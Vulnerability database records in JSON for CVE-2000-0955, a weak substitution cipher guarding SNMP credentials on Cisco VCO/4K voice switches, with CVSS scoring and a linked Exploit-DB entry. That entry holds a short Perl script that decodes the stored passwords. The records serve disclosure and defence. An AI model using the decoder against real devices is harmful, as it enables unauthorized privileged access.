{"id": "CVE-2000-0955", "bulletinFamily": "NVD", "title": "CVE-2000-0955", "description": "Cisco Virtual Central Office 4000 (VCO/4K) uses weak encryption to store usernames and passwords in the SNMP MIB, which allows an attacker who knows the community name to crack the password and gain privileges.", "published": "2000-12-19T05:00:00", "modified": "2017-12-19T02:29:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0955", "reporter": "cve@mitre.org", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/5425", "http://www.securityfocus.com/bid/1885", "http://www.atstake.com/research/advisories/2000/a102600-1.txt"], "cvelist": ["CVE-2000-0955"], "type": "cve", "lastseen": "2019-05-29T18:07:37", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "186c73a0fd42d08d0720c3c75842a4cf"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvelist", "hash": "056bf6c80585143236f0c4e721b376c5"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "cvss2", "hash": "7f7c77d2dde7216a66d00321bd5828f8"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "78a7a5cbaf09985c14389298e454e7db"}, {"key": "description", "hash": "b4030a6a57d8be6b424538f73c123704"}, {"key": "href", "hash": "a31476f13971111dc513cacde635e2e8"}, {"key": "modified", "hash": "5735d9c13cfbd331fe56a3c91e78e26d"}, {"key": "published", "hash": "873f4fc07d56ebd3b9ab96da26a56f5a"}, {"key": "references", "hash": "d9702c85d3c41ee4675de9c2ee5b933a"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "b14aecf10c269c3995b1e64893749e94"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "3cd6fecdfb170ca65d41b09550757c6eac2fe125a96b5b8ce894033d25349a9e", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:20372"]}, {"type": "osvdb", "idList": ["OSVDB:8813"]}], "modified": "2019-05-29T18:07:37"}, "score": {"value": 6.6, "vector": "NONE", "modified": "2019-05-29T18:07:37"}, "vulnersScore": 6.6}, "objectVersion": "1.3", "cpe": [], "affectedSoftware": [{"name": "cisco virtual_central_office_4000", "operator": "le", "version": "5.1.3"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": true, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": [], "cwe": ["NVD-CWE-Other"]}

{"exploitdb": [{"lastseen": "2016-02-02T14:06:11", "bulletinFamily": "exploit", "description": "Cisco Virtual Central Office 4000 (VCO/4K) 5.1.3 Remote Username and Password Retrieval. CVE-2000-0955. Remote exploit for hardware platform", "modified": "2000-10-26T00:00:00", "published": "2000-10-26T00:00:00", "id": "EDB-ID:20372", "href": "https://www.exploit-db.com/exploits/20372/", "type": "exploitdb", "title": "Cisco Virtual Central Office 4000 VCO/4K 5.1.3 - Remote Username and Password Retrieval", "sourceData": "source: http://www.securityfocus.com/bid/1885/info\r\n\r\nA vulnerability exists in the Cisco Virtual Central Office 4000 (VCO/4K) programmable voice switch running software versions 5.13 and earlier.\r\n\r\nThe usernames and passwords for the device's SNMP administration interface are protected by a simple substitution cipher which can be easily defeated. As a result, if the \"encrypted\" passwords are retrieved, (for example, through the read-only community string) an attacker can obtain a list of valid usernames and passwords potentially allowing an elevation of privileges and possibly more serious consequences.\r\n\r\n#!/usr/bin/perl\r\n\r\nprintf (\"Cisco VCO/4K Password [De]Obfuscator\\n\");\r\nprintf (\"\\t\\@stake, Inc.\\n\");\r\nprintf (\"\\tRex Warren, Brian Carrier, David Goldsmith\\n\");\r\n\r\nprintf (\"Enter Password: \");\r\n$pw = <STDIN>;\r\nchop $pw;\r\n\r\nprintf(\"Result: \");\r\nfor ($pos = 0; $pos < length($pw); $pos++){\r\nprintf(\"%s\", chr(164 - ord(substr($pw, $pos, 1))));\r\n}\r\nprintf(\"\\n\");", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/20372/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:03", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://www.cisco.com/warp/public/707/vco4kpasswdexposure-pub.shtml)\nOther Advisory URL: http://www.atstake.com/research/advisories/2000/a102600-1.txt\nISS X-Force ID: 5425\n[CVE-2000-0955](https://vulners.com/cve/CVE-2000-0955)\nBugtraq ID: 1885\n", "modified": "2000-10-26T00:00:00", "published": "2000-10-26T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:8813", "id": "OSVDB:8813", "type": "osvdb", "title": "Cisco Virtual Central Office Weak Credential Encryption", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}